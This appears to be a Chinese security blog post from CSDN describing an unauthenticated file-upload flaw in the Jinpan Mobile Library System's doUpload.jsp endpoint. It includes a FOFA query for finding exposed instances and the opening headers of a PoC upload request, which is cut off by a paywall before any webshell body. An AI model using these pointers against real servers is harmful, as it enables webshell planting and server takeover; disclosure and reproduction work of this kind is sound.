金盘移动图书馆系统 doUpload RCE漏洞复现

已于 2024-01-25 19:19:05 修改
阅读量617 收藏 2
点赞数 5
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-01-25 19:18:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/135851897
版权
本文介绍了金盘移动图书馆系统的文件上传漏洞,该漏洞允许未认证攻击者上传webshell执行恶意代码。复现环境中通过FOFA发现应用,通过PoC验证了漏洞存在,并给出了修复建议,包括限制接口访问权限和升级到安全版本。
摘要由CSDN通过智能技术生成

0x01 产品简介

金盘移动图书馆系统是金盘软件为图书馆和阅读者提供便捷服务的软件系统,可管理图书、提供借阅和归还功能,以及提供阅读者个人信息管理和图书检索服务。

0x02 漏洞概述

金盘移动图书馆系统 doUpload.jsp接口处存在文件上传漏洞,未经身份验证的攻击者可以利用此漏洞上传webshell,执行恶意代码指令,导致服务器失陷。

0x03 复现环境

FOFA:app="金盘软件-金盘移动图书馆系统"

0x04 漏洞复现

PoC

POST /pages/admin/tools/uploadFile/doUpload.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5iALAXlSiqxJXrhK

--
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
订阅专栏
漏洞复现金盘图书馆系统-doupload-任意文件上传
知黑而守白
01-25 161
金盘移动图书馆管理系统是集掌上门户,掌上APP,微信平台为一体的移动服务解决方案,在移动智能时代拉近读者与图书馆之间的距离。其存在信息泄露漏洞,泄露管理员账号密码等敏感信息。金盘移动图书馆管理系统 doUpload 接口存在文件上传漏洞。未经身份认证的攻击者通过该漏洞上传恶意文件,可能导致恶意代码执行、身份伪造、后门植入、敏感数据泄露等问题。
金盘移动图书管理系统doUpload.jsp接口存在文件上传漏洞
waxcj的博客
01-26 364
金盘移动图书管理系统doUpload.jsp接口存在文件上传漏洞
漏洞复现--用友U8-Cloud upload.jsp任意文件上传
qq_53003652的博客
10-26 632
U8 cloud集中于企业内部管理管控,管理规范,高效,协同,透明。通过云模式,低成本,快速部署,即租即用帮助企业免除硬软件投入的快速 搭建企业管理架构。通过云服务连接,业务模式、服务模式的经营创新。该产品upload.jsp存在任意文件上传漏洞。上传路径在/linux/{filename}.jsp。此处为国外网站资产,请勿非法利用!上传免杀马直接getshell。用友U8-Cloud。
金盘移动图书馆系统 RCE漏洞-1day未公开漏洞复现
weixin_43167326的博客
02-01 567
金盘移动图书馆系统金盘软件为图书馆和阅读者提供便捷服务的软件系统,可管理图书、提供借阅和归还功能,以及提供阅读者个人信息管理和图书检索服务。金盘移动图书馆系统 doUpload.jsp接口处存在文件上传漏洞,恶意攻击者可利用此问题,上传后门文件,获取服务器权限。
node.js文件上传重命名以及移动位置的示例代码
10-18
在Node.js中处理文件上传、重命名和移动位置是常见的任务,特别是在构建Web应用时。本示例代码展示了如何使用`formidable`库来处理文件上传,并进行后续的重命名和移动操作。首先,我们需要了解`formidable`库,它是...
Belajar图书馆:Aldes Belajar Membuat图书馆
02-10
Dokumentasi图书馆上传文件 objectHasil = aldes.doUpload(aldes.fileDeclaration(imagePath1),imagePath1,objectUrl,fileName1); aldes.printHasil(objectHasil,textView1); 操作上传 aldes.doUpload ...
PHP实现文件上传与下载
12-17
最后,使用`move_uploaded_file()`函数将临时文件移动到服务器上的指定目录,并重命名以防止同名冲突。 2. **文件显示**: - 在`index.php`中,通过`readdir()`遍历`./imgs/`目录中的文件,显示文件列表,包括序号...
JAVA中的文件上传.pdf
10-08
在Java Web开发中,文件上传是一项常见的功能,用于允许用户上传文件到服务器。在这个文档中,主要介绍了两种简单的方法来实现在JSP页面中的...通过不断优化和调整,我们可以构建出更加健壮和用户友好的文件上传系统
Java后端处理前端字符串与 JSON 数据:安全拼接与转义技巧
服务员的博客
08-09 398
在 Spring Boot 中处理前端传递的字符串和 JSON 数据时,需要注意潜在的 JSON 特殊字符问题。我们可以通过手动转义或借助 Jackson 库来安全地拼接字符串和 JSON 数据,确保数据完整性和程序稳定性。希望本文能够帮助您更好地理解 Spring Boot 中字符串与 JSON 数据处理的相关技巧,并在实际项目中得心应手。
DLMS/COSEM中的信息安全安全密钥(中)
最新发布
huaqianzkh的专栏
08-09 676
PKI是安全基础设施它创造和管理公钥证书以便于使用公钥(即非对称密钥)加密。为了实现这一目标,PKI需要执行两个基本任务:a)验证绑定的准确性后,生成和分发公钥证书将公钥绑定到其他信息;b)维护和分发未到期证书的证书状态信息。对于DLMS/COSEM,可以预料分层PKI包括如图23所示的以下组件。——根证书机构(Root-CA);——证书机构/下属机构(Sub-CA);——终端实体:不颁发证书的实体:DLMS/COSEM客户机,DLMS/COSEM服务器和第三方。
应急响应-主机安全系统及进程排查相关命令(Linux操作系统-初级篇)
关注网络安全、云原生安全
08-07 1164
本文介绍下在应急响应过程中,linux系统下排查系统、进程、服务可能用到的命令,有些命令选项很多,读者可以仅看常用选项。不涉及内存、进程注入、rootkit等高级攻击的排查。常用-n参数,n为展示的数量systemctl命令 是系统服务管理器指令,它实际上将 service 和 chkconfig 这两个命令组合到一起。任务旧指令新指令使某服务自动启动使某服务不自动启动检查服务状态systemctl status httpd.service (服务详细信息)
CC攻击解决方案,如何处理CC攻击
dexunyun的博客
08-09 804
CC攻击作为网络世界中的一大威胁,对网站的安全与稳定构成了严峻挑战。然而,通过部署安全加速SCDN,我们可以有效应对CC攻击,确保网站的安全与稳定。作为网络管理员和网站拥有者,我们应时刻保持警惕,不断提升自身的安全防护能力,为用户提供更加安全、可靠的网络服务。
如何确保场外个股期权交易的安全
Lunasi的博客
08-07 236
只选择那些拥有合法金融牌照、受到监管机构严格监督的平台进行交易,确保在中国交易时,平台已获得证监会或相关金融监管机构的批准。:深入学习期权的基础知识,包括不同类型的期权、它们的权利和义务、定价方式以及风险特性,从而提升自我保护的能力。:在交易前,深入分析市场趋势和相关股票的基本面,评估潜在风险,并制定相应的风险管理策略。通过这些措施,投资者可以在场外个股期权交易中提高交易的安全性,有效降低不必要的风险。:选择流动性好的期权进行交易,以便在需要时能快速买卖,减少因流动性不足带来的风险。
自学黑客(网络安全
热门推荐
2301_77160226的博客
08-05 2万+
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
访问网站显示不安全打不开怎么办如何处理
playis的博客
08-09 388
当访问网站时浏览器提示“不安全”,这通常是由于多种原因造成的。
AI大模型赋能开发者|海云安创始人谢朝海受邀在ISC.AI 2024大会就“大模型在软件开发&安全领域的应用”主题发表演讲
haiyunan的博客
08-07 323
此次会议,海云安在大会现场设置专属F003展位,海云安携自主研发国内首创的开发者安全智能助手产品亮相现场,通过产品界面展示、视频播放、现场讲解等多种声光电相结合的方式,全方位、多角度、立体化展现海云安深耕开发安全领域多年的丰硕成果。作为全球规格最高、规模最大、影响力最深远的安全峰会之一,本次大会以“打造安全大模型 引领安全行业革命”为主题,聚焦安全与AI两大领域,吸引了众多行业领袖、专家学者进行深度参与,共同探讨AI大模型安全应用等前沿话题。安全领域中以较低成本高效运用AI大模型。
加密软件有哪些常见的安全特性
shunyou0526的博客
08-07 356
核心功能:加密软件的核心在于对数据进行加密处理,通过复杂的加密算法(如AES、RSA等)将明文数据转换为密文,确保数据在存储和传输过程中的安全性。透明加密:部分加密软件支持透明加密功能,即用户在保存文件时数据会自动加密,打开文件时自动解密,无需用户手动操作,提高了使用的便捷性。灵活配置:加密软件通常提供多种加密模式供用户选择,如透明加密、智能加密、只解密不加密等,以满足不同场景下的加密需求。身份认证:在访问加密数据前,用户需要进行身份认证,如输入密码、使用生物识别技术等,以验证用户的身份和权限。
人工智能安全态势和趋势
weixin_41964296的博客
08-09 203
吴世忠中工院士 国家保密科技委主任重大风险隐患呼唤加强安全研究,人工智能面临未来担忧。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值